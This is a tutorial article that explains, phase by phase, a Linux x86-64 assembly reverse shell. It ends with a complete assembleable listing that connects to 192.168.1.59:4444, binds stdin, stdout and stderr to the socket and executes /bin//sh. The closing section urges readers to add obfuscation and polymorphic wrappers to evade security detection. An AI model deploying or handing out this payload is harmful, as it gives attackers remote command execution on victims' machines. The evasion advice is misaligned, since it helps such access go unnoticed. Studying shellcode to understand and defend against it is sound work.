Building a Reverse Shell in x86-64 Assembly: A Syscall Chain Deep Dive

Introduction

A reverse shell is a fundamental technique in systems security where a compromised target initiates an outbound connection to an attacker-controlled machine, binding its standard input, output, and error streams to the remote connection. This allows the attacker to execute commands on the target system as if they were sitting at its terminal.

The difficulty rises sharply when you implement this entirely in x86-64 assembly, with no libc and no helper binaries. You must orchestrate a precise sequence of syscalls, manage memory by hand, and lay out every data structure yourself.

In this article, we’ll examine a complete TCP-based reverse shell implementation that leverages Position Independent Code (PIC) architecture—the same Stack Anchor technique discussed in our previous article on PIC fundamentals. This approach ensures our shellcode remains executable regardless of where it’s loaded in memory.

Architecture Overview

The reverse shell follows a linear syscall chain:

[Stack Setup] → [Socket Creation] → [Connect] → [dup2 Redirection] → [execve Shell]

Each step is a discrete syscall that builds upon the previous one. Let’s dissect each phase.

Phase 1: Stack Anchor & PIC Foundation

Before executing any syscall, we establish our memory sandbox using the Stack Anchor technique:

sub rsp, 0x8000             ; Allocate 32KB on the stack
and rsp, -16                ; Round RSP down to a 16-byte boundary
mov rbp, rsp                ; Set RBP as our anchor point

Why this matters:

RSP Manipulation: We reserve a large contiguous region for read-write operations
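16-byte Alignment: The x86-64 System V ABI requires a 16-byte-aligned stack at function calls. The raw syscall instruction does not need it, but keeping the invariant is cheap and avoids surprises if aligned SSE accesses or library calls are added later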
RBP Anchoring: We fix RBP as a stable reference point for all relative addressing
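The arithmetic behind the prologue can be sketched in C. This is an illustration only: align_down_16 and stack_anchor are hypothetical helper names, and the function simply computes the value the listing would leave in rbp for a given starting rsp.

```c
#include <assert.h>
#include <stdint.h>

/* Round an address down to a multiple of 16, mirroring `and rsp, -16`.
   In two's complement, -16 is ...FFF0, so the AND clears the low four bits. */
uint64_t align_down_16(uint64_t addr)
{
    return addr & ~(uint64_t)15;
}

/* Mirror the Phase 1 prologue: reserve 0x8000 bytes, then align.
   The result is the value the listing stores in rbp.
   Assumes rsp is at least 0x8000, as any real stack pointer is. */
uint64_t stack_anchor(uint64_t rsp)
{
    uint64_t anchor = align_down_16(rsp - 0x8000);
    /* Alignment only ever moves the pointer down, never back up. */
    assert(anchor % 16 == 0 && anchor <= rsp - 0x8000);
    return anchor;
}
```

Because the AND can only lower the pointer, the aligned region never overlaps the caller's data above the original rsp.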

Next, we copy the hardcoded network structure to our writable stack region:

lea rsi, [rel struct_sockaddr]  ; Source: Read-only .text section
lea rdi, [rbp + 0x200]          ; Destination: Writable stack
mov rcx, 16                     ; sockaddr_in is exactly 16 bytes
rep movsb                       ; Byte-wise copy

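Why copy to the stack? The .text section is mapped R-X (readable, executable, not writable), so template data that must change at runtime, such as a patched IP address or port, has to live in writable memory. The stack provides that, and the kernel reclaims it when the process exits. Strictly speaking, connect only reads the structure, so this listing would also work with a pointer straight into .text; the copy matters once the payload needs to modify the template.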
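To make the copy-then-modify idea concrete, here is a minimal C sketch. The byte values match struct_sockaddr from the listing; copy_and_patch_port is a hypothetical helper that is not part of the original shellcode, and port 8080 in the usage note is just an example value.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Read-only template, byte for byte the same as struct_sockaddr. */
static const uint8_t sockaddr_template[16] = {
    0x02, 0x00,             /* sin_family = AF_INET (little-endian word) */
    0x11, 0x5c,             /* sin_port   = 4444, big-endian */
    192, 168, 1, 59,        /* sin_addr */
    0, 0, 0, 0, 0, 0, 0, 0  /* sin_zero */
};

/* Copy the template into caller-provided writable memory (the role of
   `rep movsb`), then overwrite the port field in place.
   Hypothetical helper for illustration only. */
void copy_and_patch_port(uint8_t dst[16], uint16_t port)
{
    memcpy(dst, sockaddr_template, sizeof sockaddr_template);
    dst[2] = (uint8_t)(port >> 8);      /* high byte first: network order */
    dst[3] = (uint8_t)(port & 0xff);
    assert(dst[0] == 0x02 && dst[1] == 0x00);   /* family is untouched */
}
```

Calling copy_and_patch_port(buf, 8080) leaves the template itself unchanged and writes the bytes 0x1f 0x90 into the port field of buf.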

Phase 2: Socket Creation (SYS_socket = 41)

mov rax, 41                 ; SYS_socket syscall number
mov rdi, 2                  ; AF_INET (IPv4)
mov rsi, 1                  ; SOCK_STREAM (TCP)
mov rdx, 0                  ; IPPROTO_IP (default)
syscall
mov r12, rax                ; Save socket FD in r12

Register Breakdown (x86-64 syscall convention):

rdi = First argument (address family)
rsi = Second argument (socket type)
rdx = Third argument (protocol)
rax = Return value (file descriptor or negative error)

The kernel returns a file descriptor (typically 3 or higher) in rax. We immediately save this in r12 because we’ll reference it multiple times in subsequent syscalls.
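The "negative error" case deserves a closer look, because the listing never tests rax. On Linux, a raw syscall signals failure by returning the negated errno value, in the range -4095 to -1. The sketch below shows how such a value could be decoded; the function names are hypothetical and the code is not part of the shellcode.

```c
#include <assert.h>
#include <errno.h>

/* The raw Linux syscall interface reports failure by returning -errno.
   Values in [-4095, -1] are errors; anything else is a valid result. */
int raw_syscall_failed(long rax)
{
    return rax < 0 && rax >= -4095;
}

/* Recover the positive errno from a failed raw return value. */
int raw_syscall_errno(long rax)
{
    assert(raw_syscall_failed(rax));
    return (int)-rax;
}
```

In assembly, the equivalent check is a test rax, rax followed by js to an error path, placed right after the syscall instruction.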

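Why r12? The syscall instruction itself overwrites rcx and r11, and the kernel returns its result in rax; every other general-purpose register, r12 included, is preserved across the call. r12 is also callee-saved under the x86-64 SysV ABI, so the value would survive ordinary function calls too. That makes it a safe home for state we need in several later syscalls.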

Phase 3: Establish Connection (SYS_connect = 42)

mov rax, 42                 ; SYS_connect syscall number
mov rdi, r12                ; socket FD (from previous step)
lea rsi, [rbp + 0x200]      ; Pointer to sockaddr_in struct
mov rdx, 16                 ; Size of sockaddr_in
syscall

Data Structure Reference: The sockaddr_in struct (16 bytes) contains:

Offset  Size  Field
0       2     sin_family (AF_INET = 2)
2       2     sin_port (4444 in network byte order: bytes 0x11 0x5c, written in the source as the little-endian word 0x5c11)
4       4     sin_addr (IPv4 address: 192.168.1.59)
8       8     sin_zero (padding, must be zero)
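For comparison, the same 16 bytes can be produced with the standard socket headers. This is a sketch assuming Linux on a little-endian machine (where sin_family occupies the first two bytes); build_sockaddr is a hypothetical helper name.

```c
#include <arpa/inet.h>
#include <assert.h>
#include <netinet/in.h>
#include <string.h>

/* Fill a sockaddr_in for 192.168.1.59:4444, the values used in the article.
   Returns 0 on success, -1 if the address string fails to parse. */
int build_sockaddr(struct sockaddr_in *sa)
{
    assert(sizeof *sa == 16);        /* the length passed to connect */
    memset(sa, 0, sizeof *sa);       /* also zeroes sin_zero */
    sa->sin_family = AF_INET;        /* stored in host byte order */
    sa->sin_port = htons(4444);      /* network byte order: bytes 11 5c */
    return inet_pton(AF_INET, "192.168.1.59", &sa->sin_addr) == 1 ? 0 : -1;
}
```

Dumping the resulting struct byte by byte gives 02 00 11 5c c0 a8 01 3b followed by eight zero bytes, which is exactly what the dw/db/dq template emits.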

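The connect syscall blocks until the connection succeeds or fails. On success, the kernel has established a TCP connection to the IP:port in the structure, and our socket FD now represents the active connection. On failure, rax holds a negative errno value; this listing does not check it and continues regardless.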

Phase 4: Redirect File Descriptors (SYS_dup2 = 33)

This is the critical phase where we bind stdin, stdout, and stderr to the socket:

mov rbx, 2                  ; Counter: will loop from 2 down to 0
_loop:
mov rax, 33                 ; SYS_dup2 syscall number
mov rdi, r12                ; socket FD (source)
mov rsi, rbx                ; target FD (2, 1, 0)
syscall
dec rbx                     ; Decrement counter
jns _loop                   ; Jump if not negative (2→1→0)

Three Iterations:

dup2(socket_fd, 2) → stderr now reads/writes to socket
dup2(socket_fd, 1) → stdout now reads/writes to socket
dup2(socket_fd, 0) → stdin now reads/writes to socket

Why this works: After dup2, any process that inherits these file descriptors will automatically send output to the socket and receive input from it. The redirection is transparent to the child process.

The loop elegantly handles three redirections in minimal code. The jns (jump if not signed/negative) instruction continues while rbx ≥ 0; when rbx becomes -1, the loop exits.
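The countdown loop and the effect of dup2 can be tried safely in C. In the sketch below, a pipe stands in for the socket and descriptors 100 to 102 stand in for 0 to 2, so the demo does not hijack the calling terminal. Those numbers are an assumption (they must be unused in the calling process), and both function names are hypothetical.

```c
#include <assert.h>
#include <string.h>
#include <unistd.h>

/* Duplicate src onto each descriptor in targets[], last entry first,
   mirroring the dec/jns countdown. Returns 0 on success, -1 on failure. */
int redirect_all(int src, const int *targets, int count)
{
    assert(count >= 0);
    for (int i = count - 1; i >= 0; i--) {   /* exits once i reaches -1 */
        if (dup2(src, targets[i]) < 0)
            return -1;
    }
    return 0;
}

/* Returns 1 if bytes written through the duplicates arrive at the pipe. */
int dup2_demo(void)
{
    int p[2];
    const int spare[3] = {100, 101, 102};    /* assumed to be unused */
    char buf[4] = {0};

    if (pipe(p) < 0)
        return 0;
    if (redirect_all(p[1], spare, 3) < 0) {
        close(p[0]);
        close(p[1]);
        return 0;
    }

    /* A write to any duplicate lands in the same underlying pipe. */
    int ok = write(spare[0], "a", 1) == 1
          && write(spare[2], "b", 1) == 1
          && read(p[0], buf, 2) == 2
          && memcmp(buf, "ab", 2) == 0;

    close(p[0]);
    close(p[1]);
    for (int i = 0; i < 3; i++)
        close(spare[i]);
    return ok;
}
```

All three duplicates share one open file description with the source, which is why closing the original descriptor afterwards would not break the redirection.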

Phase 5: Execute Shell (SYS_execve = 59)

xor rdx, rdx                ; rdx = 0 (envp = NULL, empty environment)
mov rax, 59                 ; SYS_execve syscall number
lea rdi, [rel run]          ; rdi = filename pointer ("/bin//sh")
push 0                      ; Push NULL terminator onto stack
push rdi                    ; Push argv[0] (filename) onto stack
mov rsi, rsp                ; rsi = pointer to argv array
syscall

Syscall Signature (execve):

int execve(const char *filename,  // rdi
           char *const argv[],     // rsi
           char *const envp[]);    // rdx

The Argv Array Construction:

We build a minimal argv on the stack:

[Stack After Both Pushes]
...
[rsp + 16]  → (higher addresses, previous stack contents)
[rsp + 8]   → argv[1] = NULL (array terminator, pushed first)
[rsp]       → argv[0] = pointer to "/bin//sh" (pushed second)

Then mov rsi, rsp makes rsi point to the start of this array. The kernel interprets this as:

argv[0] = the shell path
argv[1] = NULL (signals end of array)
No environment variables (rdx = 0)
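Since push moves rsp downward before storing, the value pushed last ends up at the lowest address, which is where argv[0] must be. A toy model of the two pushes makes the ordering explicit; the struct and function names here are hypothetical, and 0x401000 in the usage note is an arbitrary stand-in for the address of the path string.

```c
#include <assert.h>
#include <stdint.h>

/* A toy descending stack: push decrements the index, then stores,
   matching how x86-64 `push` subtracts 8 from rsp before writing. */
struct toy_stack {
    uint64_t slot[8];
    int sp;                  /* index of the current top; 8 means empty */
};

void toy_push(struct toy_stack *s, uint64_t value)
{
    assert(s->sp > 0);       /* no room left would be a stack overflow */
    s->slot[--s->sp] = value;
}

/* Replay `push 0` / `push rdi` and return the index rsi would point at. */
int build_argv(struct toy_stack *s, uint64_t path_ptr)
{
    s->sp = 8;
    toy_push(s, 0);          /* argv[1] = NULL, at the higher address */
    toy_push(s, path_ptr);   /* argv[0] = path, at the lower address */
    return s->sp;            /* the role of `mov rsi, rsp` */
}
```

With rsi = build_argv(&s, 0x401000), slot[rsi] holds the path pointer and slot[rsi + 1] holds the NULL terminator, matching what execve expects to find at rsi and rsi + 8.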

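Why minimal argv? /bin/sh needs no arguments beyond argv[0]: with none given, it reads commands from stdin. Because stdin is a socket rather than a terminal, the shell runs non-interactively, so it prints no prompt and provides no job control, but it still executes each line it receives.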

The Shell Loop: Why No Loop is Needed

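After execve succeeds, no new process is created: the kernel replaces the current process image with /bin/sh under the same PID. Two consequences matter here:

The redirected file descriptors stay open, so stdin/stdout/stderr remain bound to the socket (descriptors created by dup2 never carry the close-on-exec flag)
The old memory image, including our shellcode and its stack buffer, is discarded and replaced by the shell’s own code and data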

The /bin/sh binary contains its own read-and-execute loop, driven by read() syscalls on stdin:

// Simplified shell behavior (pseudocode)
while (1) {
    read(0, buffer, sizeof(buffer));   // Read a command from stdin (socket)
    parse_and_execute(buffer);         // Child commands inherit fds 0-2, so
                                       // their output goes to the socket too
}

Because stdin/stdout/stderr point to the socket, every interaction happens over the network connection without any additional coordination in our shellcode.
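The same behavior can be observed locally without any networking. The sketch below forks a child, points its fd 0 at a pipe (standing in for the socket), and runs the shell with the same minimal argv and NULL envp. It assumes a Linux system with a shell at /bin/sh; run_shell_with_stdin is a hypothetical helper name.

```c
#include <assert.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Feed `script` to /bin//sh through fd 0 and return the shell's exit
   status, or -1 on failure. */
int run_shell_with_stdin(const char *script)
{
    int p[2];
    assert(script != NULL);
    if (pipe(p) < 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0) {
        close(p[0]);
        close(p[1]);
        return -1;
    }

    if (pid == 0) {                       /* child */
        char *argv[] = { "/bin//sh", NULL };
        close(p[1]);
        if (p[0] != 0) {
            dup2(p[0], 0);                /* stdin now reads from the pipe */
            close(p[0]);
        }
        execve(argv[0], argv, NULL);      /* replaces the child's image */
        _exit(127);                       /* reached only if execve failed */
    }

    close(p[0]);
    ssize_t n = write(p[1], script, strlen(script));
    close(p[1]);                          /* EOF ends the shell's read loop */

    int status;
    if (waitpid(pid, &status, 0) < 0 || n < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Passing a script such as "exit 7\n" makes the shell terminate with that status, which confirms that it consumed the command from the redirected descriptor rather than from a terminal.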

Complete Code Reference

; nasm -f elf64 reverse_shell_tcp.asm -o reverse_shell.o
; ld reverse_shell.o -o reverse_shell

global _start

section .text

_start:
    ; Phase 1: Stack anchor and template copy
    sub rsp, 0x8000
    and rsp, -16
    mov rbp, rsp                    ; Stack anchor

    lea rsi, [rel struct_sockaddr]
    lea rdi, [rbp + 0x200]
    mov rcx, 16
    rep movsb
    jmp continue                    ; Skip over the embedded data

; --- DATA TEMPLATES ---
struct_sockaddr:
    dw 2                            ; sin_family: AF_INET (2)
    dw 0x5c11                       ; sin_port: 4444 (network byte order)
    db 192, 168, 1, 59              ; sin_addr: target IP address
    dq 0                            ; sin_zero: 8-byte padding

run db "/bin//sh", 0

continue:
    ; Phase 2: Create socket
    mov rax, 41                     ; SYS_socket
    mov rdi, 2
    mov rsi, 1
    mov rdx, 0
    syscall
    mov r12, rax                    ; Save socket FD

    ; Phase 3: Connect to target
    mov rax, 42                     ; SYS_connect
    mov rdi, r12
    lea rsi, [rbp + 0x200]          ; Use copied sockaddr
    mov rdx, 16
    syscall

    ; Phase 4: Redirect file descriptors
    mov rbx, 2
_loop:
    mov rax, 33                     ; SYS_dup2
    mov rdi, r12
    mov rsi, rbx
    syscall
    dec rbx
    jns _loop

    ; Phase 5: Execute shell
    xor rdx, rdx
    mov rax, 59                     ; SYS_execve
    lea rdi, [rel run]
    push 0
    push rdi
    mov rsi, rsp
    syscall

Context: When & Why PIC for Reverse Shells

Why This Implementation Uses PIC

This reverse shell uses Position Independent Code not because a standalone ELF binary strictly needs it, but because it demonstrates how injected payloads are built.

Shellcode produced by exploitation frameworks (Metasploit, Cobalt Strike) is position independent because:

Target memory layout is unknown (ASLR)
The payload must run at whatever address it is injected, with no loader to apply relocations
The same bytes are reused across many deployments without rebuilding

Learning Perspective

This article uses PIC because it’s the correct modern pattern, even though simpler alternatives exist. When you learn systems programming, it’s better to master best practices from day one.

When You Wouldn’t Use PIC

For comparison, you’d skip PIC in these scenarios:

Controlled lab environment: Known base addresses, ASLR disabled
Embedded systems: Fixed memory layout (bootloader → kernel)
Proof-of-Concept: Simple buffer overflow with hardcoded return address
Educational debugging: Understanding one concept at a time

However, in real-world offensive security, PIC is the industry standard because you never control the target environment.

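Bottom line: The addressing pattern shown here is the one professional tooling relies on. The listing itself omits error handling, so treat it as a learning foundation that scales to professional tools rather than a finished payload.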

Key Takeaways

PIC Architecture: Every memory reference uses relative addressing ([rel ...] or [rbp + offset]). No hardcoded absolute addresses exist in the binary.
Syscall Chaining: The shellcode is a linear sequence of syscalls, each building on the previous one. The only control flow is the jmp over the embedded data and the dup2 loop.
File Descriptor Inheritance: Once stdin/stdout/stderr are bound to the socket via dup2, they remain bound after execve. The shell inherits these redirections automatically.
Stack as Writable Storage: Read-only templates in .text are copied to the stack, allowing runtime modification while respecting kernel memory protections.
Minimal Dependencies: The entire payload fits in a few hundred bytes and depends only on the Linux kernel. No libc, no helper functions.

Conclusion

Building a reverse shell in assembly reveals the elegant simplicity of POSIX syscalls. By understanding how socket I/O, process execution, and file descriptor redirection work at the syscall level, you gain deeper insight into how operating systems manage processes and resources.

RIP-relative addressing and the Stack Anchor technique together keep the payload executable from any memory location, a critical requirement for reliable shellcode deployment in real-world scenarios.

Next steps: Experiment with different shellcode obfuscation techniques, encoding schemes, or polymorphic wrappers to evade security detection mechanisms while preserving the core syscall logic.

GitHub: https://github.com/JM00NJ/Sectionless-Craft/tree/main/Networking/reverse_shells

Disclaimer: This article is for educational purposes only. Reverse shells should only be used on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.
